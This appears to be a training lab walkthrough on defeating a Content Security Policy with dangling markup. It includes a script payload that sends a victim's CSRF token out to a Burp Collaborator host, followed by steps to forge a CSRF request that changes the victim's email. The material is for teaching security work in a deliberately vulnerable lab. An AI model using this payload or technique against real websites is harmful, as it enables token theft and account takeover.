This lab uses CSP to mitigate against XSS attacks.
To solve the lab, perform a dangling markup attack that steals a CSRF token and uses it to change the email address of another user.
You can log in to your own account using the following credentials: wiener:peter
Note
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (burpcollaborator.net).
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Back in the lab, go to the exploit server and add the following code, replacing your-lab-id with your lab ID, and replacing your-collaborator-id with the payload that you just copied from Burp Collaborator.
<script>
location='https://your-lab-id.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//your-collaborator-id.burpcollaborator.net?';
</script>
Click "Store" and then "Deliver exploit to victim". If the target user visits the website containing this malicious script while they are still logged in to the lab website, their browser will send a request containing their CSRF token to your malicious website. You can then steal this token using the Burp Collaborator client.
Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see an HTTP interaction that was initiated by the application. Select the HTTP interaction, go to the "Request" tab, and copy the user's CSRF token.
With Burp's intercept feature switched on, go back to the update email function of the lab and submit a request to change the email to any random address.
In Burp, go to the intercepted request and change the value of the email parameter to hacker@evil-user.net.
Right-click on the request and, from the context menu, select "Engagement tools" and then "Generate CSRF PoC". The popup shows both the request and the CSRF HTML that is generated by it. In the request, replace the CSRF token with the one that you stole from the victim earlier.
Click "Options" and make sure that the "Include auto-submit script" is activated.
Click "Regenerate" to update the CSRF HTML so that it contains the stolen token, then click "Copy HTML" to save it to your clipboard.
Drop the request and switch off the intercept feature.
Go back to the exploit server and paste the CSRF HTML into the body. You can overwrite the script that we entered earlier.
Click "Store" and "Deliver exploit to victim". The user's email will be changed to hacker@evil-user.net.
Community solutions
Michael Sommer
Want to track your progress and have a more personalized learning experience? (It's free!)
